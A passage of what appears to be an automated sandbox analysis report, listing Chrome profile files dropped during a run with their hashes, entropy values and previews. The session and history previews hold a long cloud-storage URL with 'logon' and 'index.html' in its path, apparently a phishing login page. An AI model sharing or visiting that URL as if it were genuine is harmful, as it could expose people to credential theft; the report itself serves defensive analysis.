                                                                                                                                                                                Preview: 2021/10/25-18:17:21.421 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/25-18:17:21.422 91c Recovering log #3.2021/10/25-18:17:21.447 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):11217
                                                                                                                                                                                Entropy (8bit):6.069602775336632
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                                                                                                                                                MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                                                                                                                                                SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                                                                                                                                                SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                                                                                                                                                SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_1\_metadata\computed_hashes.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):23474
                                                                                                                                                                                Entropy (8bit):6.059847580419268
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:7dNc1NC6IcafusK4H1IIGRlhKlkIALQWdynQh2RX4K6M1tVztzr7XSNyzH:7dOscSRKc1nGRSkIhEw6M1tf7SNyb
                                                                                                                                                                                MD5:6AE2135EA4583C2F06CDEBEA4AE70FA4
                                                                                                                                                                                SHA1:DCEB26C7F02D53B5F214305F4C75B4A33A79CDC2
                                                                                                                                                                                SHA-256:03AA1944CB3C4F39E20B6361571BC45DFBEBD3FFDA3D8F148CC6ECB29958F903
                                                                                                                                                                                SHA-512:B5945E67D9F73DD1982D687E5C6D9B5D6B3886C8050363A259755C76AC0F93651F3425FA7C21AA6A13977AC1C8C9322F998F131648CB8909096058D4F0D23312
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"file_hashes":[{"block_hashes":["DOZdV3jFvk12AM2JNDYKo3KZrIVRprmJ+sVGWkqqE4Q=","rVElW3Hu3T52SzDDUqGT5YiJTBGUv2h3pNuBKFlhZ1U=","X/3fg4KZxgQ1jBr5QGq0F5JnflgE27UErd88mrxTcxs=","VibLbpy0ig+5INMOU71fTYN76iaka2XVpmm1qAKYsX8=","EChCwCbQHbHQ7oDdGT2qNyiRJ0yck2YC2emNGq4whtE="],"block_size":4096,"path":"_locales/iw/messages.json"},{"block_hashes":["xklkoZ7iSU1+7cd6DAtEmUC5lPFd+EgcbnzxkOiFwlk=","3KbsvoxKY/3AwqgF2aAdVQRpMhsNVRkQ3rx2A6Z2Z+Y=","o9+tsohquaCMj+70zeinRG/hBhA2uLoDl/WoC1uokME=","xV/K8xucyWJELVT8Cqn+ugFjobBVmg8pnmACF+2PP4Y=","p/mvJm2wuCl32Rx3it654MljKAsMe3S9IDEabc1A8mE=","j8mPrTb5oOsBTj2Fer78JE6xG6+kR64Cvu2SW8d3j/k=","nqSRpGQ3USU2bZJsZ+AzBmFOyann8omwJrhEWFZDTXc=","eTcQyJUuNuF9yCga/fXGyFCj/pysSceanhBzksdx23s=","Wj7faqnspelXKMvnduxHn1XUBG8TEOqyns7/oUihekM=","VtBwXoadI3EP336rAiL33Gz19KGqtN+RYdKnMKAXoLw=","iDgLXQqXJp8nCZxgLuC9LXM45DGfufvGnXvmHsn18wc=","g+RfdDfrWTUK0Pkcsbot7NJ4SC9wVRV/dVVMuHAtEj8=","2oC4HcCuXu3VjFf6wnKlznt9uqQNaebcuWpm/mWj69U=","aMUIpuFqPMiieSaWhIktCK62v2P3OZQAWupWsYzCnvk=","L
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):38
                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                                                MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                                                SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                                                SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                                                SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .f.5................f.5...............
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.28509503791715
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maamCIq2PWXp+N23iKKdK25+Xqx8chI+IFUtnayWZmwBaMCzkwOWXp+N23iKKdKI:pamCIva5KkTXfchI3FUtnayW/BaJ5f5G
                                                                                                                                                                                MD5:3FAEDF5294518D6F796C2EC02577AF20
                                                                                                                                                                                SHA1:50F5611CB93FE6F7B555F805D1F80390E9FCACCD
                                                                                                                                                                                SHA-256:13682115C2C01525290882A579D5CCBABFFC0BF006F3418778184D26353282BB
                                                                                                                                                                                SHA-512:F338DBE990648BBD8B0D1A9A5FD7DE62405B53C2F9560BF3216E39D1FFC455E1864F7D29003CD72D0935C24A831CC66BC50C514D2B2AF933E200B4B16C860F72
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.530 520 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/25-18:17:36.534 520 Recovering log #3.2021/10/25-18:17:36.536 520 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old.k (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):369
                                                                                                                                                                                Entropy (8bit):5.28509503791715
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maamCIq2PWXp+N23iKKdK25+Xqx8chI+IFUtnayWZmwBaMCzkwOWXp+N23iKKdKI:pamCIva5KkTXfchI3FUtnayW/BaJ5f5G
                                                                                                                                                                                MD5:3FAEDF5294518D6F796C2EC02577AF20
                                                                                                                                                                                SHA1:50F5611CB93FE6F7B555F805D1F80390E9FCACCD
                                                                                                                                                                                SHA-256:13682115C2C01525290882A579D5CCBABFFC0BF006F3418778184D26353282BB
                                                                                                                                                                                SHA-512:F338DBE990648BBD8B0D1A9A5FD7DE62405B53C2F9560BF3216E39D1FFC455E1864F7D29003CD72D0935C24A831CC66BC50C514D2B2AF933E200B4B16C860F72
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.530 520 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/25-18:17:36.534 520 Recovering log #3.2021/10/25-18:17:36.536 520 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                Entropy (8bit):5.243565938984833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maavOq2PWXp+N23iKKdK25+XuoIFUtna+ZmwBaIrkwOWXp+N23iKKdK25+XuxWLJ:pa2va5KkTXYFUtna+/Bay5f5KkTXHJ
                                                                                                                                                                                MD5:BEF4525FB34C209A5D9145CB5EF51B5D
                                                                                                                                                                                SHA1:722005D013F04F3D72CC665F11DD0422DA40AA0D
                                                                                                                                                                                SHA-256:A1178F3A22AD5E5E7E94370991425D3962E1AD468960283B8C3EA0138151EB13
                                                                                                                                                                                SHA-512:C401CCD522D9B29A7D6C2BBBC19BDA01CCA4A986E0D58C777E91AB77F10276AA5A164A904424F388673E80329D2690219B36CD9E487B150922417F767BE72A48
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.514 520 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/25-18:17:36.519 520 Recovering log #3.2021/10/25-18:17:36.520 520 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                Entropy (8bit):5.243565938984833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maavOq2PWXp+N23iKKdK25+XuoIFUtna+ZmwBaIrkwOWXp+N23iKKdK25+XuxWLJ:pa2va5KkTXYFUtna+/Bay5f5KkTXHJ
                                                                                                                                                                                MD5:BEF4525FB34C209A5D9145CB5EF51B5D
                                                                                                                                                                                SHA1:722005D013F04F3D72CC665F11DD0422DA40AA0D
                                                                                                                                                                                SHA-256:A1178F3A22AD5E5E7E94370991425D3962E1AD468960283B8C3EA0138151EB13
                                                                                                                                                                                SHA-512:C401CCD522D9B29A7D6C2BBBC19BDA01CCA4A986E0D58C777E91AB77F10276AA5A164A904424F388673E80329D2690219B36CD9E487B150922417F767BE72A48
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.514 520 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/25-18:17:36.519 520 Recovering log #3.2021/10/25-18:17:36.520 520 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                Entropy (8bit):5.269683638626551
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaGg3+q2PWXp+N23iKKdKWT5g1IdqIFUtnaEAmWZmwBaeVkwOWXp+N23iKKdKW4:paGg3+va5Kkg5gSRFUtnaJZ/BaeV5f5N
                                                                                                                                                                                MD5:1A390AF40BBEC4407475D5BCF27AD0B7
                                                                                                                                                                                SHA1:60B647232844031C3795E6064E3EC3099DF3D28B
                                                                                                                                                                                SHA-256:3AAC49691D02192904A148067633E211B6AA3678A309939A4DCB6F071E0A0CBD
                                                                                                                                                                                SHA-512:6B5477F9972C9FA33FDD2C2A9B4F1AA0BF44484E3E21E5C412B76BB45D412BC144FE8B06EDCA1F0C14B11C91669C75F6CD87873ED32189D49421949B3E3F3624
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.400 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/25-18:17:36.402 d0c Recovering log #3.2021/10/25-18:17:36.403 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                Entropy (8bit):5.269683638626551
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaGg3+q2PWXp+N23iKKdKWT5g1IdqIFUtnaEAmWZmwBaeVkwOWXp+N23iKKdKW4:paGg3+va5Kkg5gSRFUtnaJZ/BaeV5f5N
                                                                                                                                                                                MD5:1A390AF40BBEC4407475D5BCF27AD0B7
                                                                                                                                                                                SHA1:60B647232844031C3795E6064E3EC3099DF3D28B
                                                                                                                                                                                SHA-256:3AAC49691D02192904A148067633E211B6AA3678A309939A4DCB6F071E0A0CBD
                                                                                                                                                                                SHA-512:6B5477F9972C9FA33FDD2C2A9B4F1AA0BF44484E3E21E5C412B76BB45D412BC144FE8B06EDCA1F0C14B11C91669C75F6CD87873ED32189D49421949B3E3F3624
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.400 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/25-18:17:36.402 d0c Recovering log #3.2021/10/25-18:17:36.403 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEfl/igll:/M/xT02zg
                                                                                                                                                                                MD5:85D285BD216A2B68062BE9DB126F79D1
                                                                                                                                                                                SHA1:A343876D12945B37FD602BA461878996920E6A31
                                                                                                                                                                                SHA-256:12B3CC09F134F6F344AE2D4A0672E1878C06BCE35DC2A74E4E4EBD2DB2A6E433
                                                                                                                                                                                SHA-512:5A54D84741C338D919B9750A6A2304C483A37D85175FC26B489C452A000675502870E3E8B9F5A7AEE0779CF3708958E08D97E170B44C23CC357A44C55E7C3A2F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):122880
                                                                                                                                                                                Entropy (8bit):0.6778133106968087
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:/SPSTsAgB+bDo3irhnydVj3XBBE3u0PSVsA:/dsoU3iVy/BBE3uFs
                                                                                                                                                                                MD5:7C64800E53E44A4B08D864DB832C8335
                                                                                                                                                                                SHA1:09D8DAB3DC9A4A183D73FCB5B4158D34FD17363C
                                                                                                                                                                                SHA-256:8402DE813BB48CD6B1D03A597566C8D4BC535BE701FA3AC36098243ABDF85F06
                                                                                                                                                                                SHA-512:8826EC87BAB2EBE210EF524F440F259AE833EA25E244D886E52DD89BA515B9A525CBFF75E931BFFC54ECC6C0FE4718C1AE62BA5B22A918D8D07C592D995F70F4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4839
                                                                                                                                                                                Entropy (8bit):6.317239392002873
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:i8AH/iJ2CGBfM6l7OZrUv08r08bFM0cPSTsAE3IGE:PW/iqFpNvDITPSTsA/
                                                                                                                                                                                MD5:ABDDCB2A8116DC64E522D05F354B8D95
                                                                                                                                                                                SHA1:0D6DCC2F99977704F15A85F4E8873B06105F62FA
                                                                                                                                                                                SHA-256:0F2EBBBFC1A28044195C728D7C249D49B7995A8C41E54AB6A6DE1BB22F8BCEE3
                                                                                                                                                                                SHA-512:A63E39D998ED232B5E0737CA118372B8058FABCCFCF03C16330A6D49E1F4B8F1C7DBE43179DE743DDB8F915FE14DF7DA303D3282863CDB88578E92C670C275E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ............"...+.*00f74ba44bb50aa58a9dfd79647238a8f996daa403..1d93765276e7..32c6..49b0.y4dmrnikolle47cq43py7p2mypfkpitisbcim8itdvuzsv5ubnwutgnfimcvdn95xfg7ylpb4pk7mgtnykl6h73onzrs0tnqkpgxfmcgl9sjrmuh2hxqovxq0n..7zmkwd94..83e6..93o..account..afshe3vcvfzndf..apidata..avoh4xv0ob1k69d..b.Rbjqrpx5f866thjl87vl2ozmhon2zn6fgk9eamh6l71eghyemnh69wwpaccwpkljlmjnviqygovxam5girr.Zbstdgylsbzcoi1h5qum3vxhmbmazyeycbhgemb6qfg4do70melmz0hmqk1lb3zolugqvyl1ndueuvklqpwtxdq3zeb..com..download..fa5hqbvlcfrbgopbckbbouoy.Wfzho5mjnqoa9btfjmzfmqk75bh1ypelgaun31aycc9l1geigi9xs2ai2bdhpnqb6oaelzljzdjisos0jhoqorqa..googleusercontent.Rgyuldzgfe6zocmxuvu2okrxbbfc3a0i4io1wftvhtl1urvwalvpfecoqbacgctpqtz45u5bblhyhoygrix."hphteuu8ulcf1qphhfivg5xjwbbd9deixk..html..https..id63757945b..index..into..j..jk..jmn2dw..lga6imebvzrah6..login..logon..o..or..school..storage..udmprbtrn6b7..v1..work. wvzqjvqu3acmffc05islal45aubr7xjd..your...yrndfja6qsh5mxjezjewhpyesrfni67jgoncruow0ihe2tsfjfiz1kchtug4iakfrofuf2ixmgmz0cygvwfjgzltwai4bz
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                Entropy (8bit):0.32775625444421347
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:a/fMt76Y4QZVRtRex99pG/pUSqR4EZY4QZv8fOpn:anMWQA9LM+BQZ8fOpn
                                                                                                                                                                                MD5:D294662E0A3090DC83DEEDB762473739
                                                                                                                                                                                SHA1:A3EB973A2342A3ABDFD4D192DD91FCF563D12280
                                                                                                                                                                                SHA-256:0DA1256C398BA4D5F0B472B1084C3AC00A17EAEDE58C8FB6CB423FF5D328115F
                                                                                                                                                                                SHA-512:6E7FCEBA72B3F00D3DC24FF3FC342C97510802A13334963A1A352A09CF9BF469F9943212351412026A1A02A353DFBB850AFC1DBC9B02991945687378F505CCF2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ...............q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session9q (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):6313
                                                                                                                                                                                Entropy (8bit):4.999154893070947
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:34eZFM0cPSTsAEBSVodzN8ldMJ9b0pZFGPCbN6d5oFM0cPSTsAEP7l:3hQPSTsAqRIaqG6u5PSTsAe
                                                                                                                                                                                MD5:B5F78D95B1CF77B42243CDA30AC977FB
                                                                                                                                                                                SHA1:0C75EDCE4E41389CE57A78291658F302C18DED19
                                                                                                                                                                                SHA-256:416A718815E11F9998B88607C5BE97CE5D817498824EC676E7AD55AB51011015
                                                                                                                                                                                SHA-512:0C7E1246BF7A87C2746682DDCE6FA8E214C0DFDB68DD69E4D1AAB620C92A24BD8E762E2A8971FE3F24F9FC6C9E13185B914D648767F56432BE4F591A588844F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SNSS....................................................!.............................................1..,.......$...1e1f6d57_8306_4ff5_9329_811f940ced6b..........................................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}.............%.. ...............https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egH
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabske (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                Entropy (8bit):1.8112781244591325
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:3Dtn:3h
                                                                                                                                                                                MD5:0686D6159557E1162D04C44240103333
                                                                                                                                                                                SHA1:053E9DB58E20A67D1E158E407094359BF61D0639
                                                                                                                                                                                SHA-256:3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
                                                                                                                                                                                SHA-512:884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SNSS....
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):7824
                                                                                                                                                                                Entropy (8bit):5.390422297488815
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:oIXgdczDpE5fgnwKHgQAy9odDSyIE5fgZV:bsowsOGV
                                                                                                                                                                                MD5:B57423E2B9886F9869D67292620A60ED
                                                                                                                                                                                SHA1:19AD9237DC54322AC799EEC3302E680A6E65AB8E
                                                                                                                                                                                SHA-256:E22B59D09D2CE6E4AF647B517883F9BA1F8B6413949BF1504CC013B739E3C971
                                                                                                                                                                                SHA-512:48033C9D11BAB038CE722802BF82CEC71C4F925CABC66189382A5D1DA1DA83FBD2FA0DD9DC60EF8593E60179AB314DE54075EFA5F1E44DE49699085892DA6048
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ...5.................VERSION.1.8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..............Q_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.CloudProvider7.{"cloudEnabled":false,"notifiedHangoutsPrivacy":false}.S_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.IdentityService6.{"signedIn":false,"userEmail":null,"kioskAuth":false}.Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.a_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.IdGenerator.cast.RequestIdGenerator..826992000.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2020-09-30 07:58:17.19][INFO][mr.Init] MR instance ID: eed8a5c4-c410-41ec-8296-fe0906655421\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Cast MRP is disabled.\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Mirroring Service is enabled.\n","[2020-09-30 07:58:17.21][INFO
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):329
                                                                                                                                                                                Entropy (8bit):5.198308983975779
                                                                                                                                                                                Encrypted:false
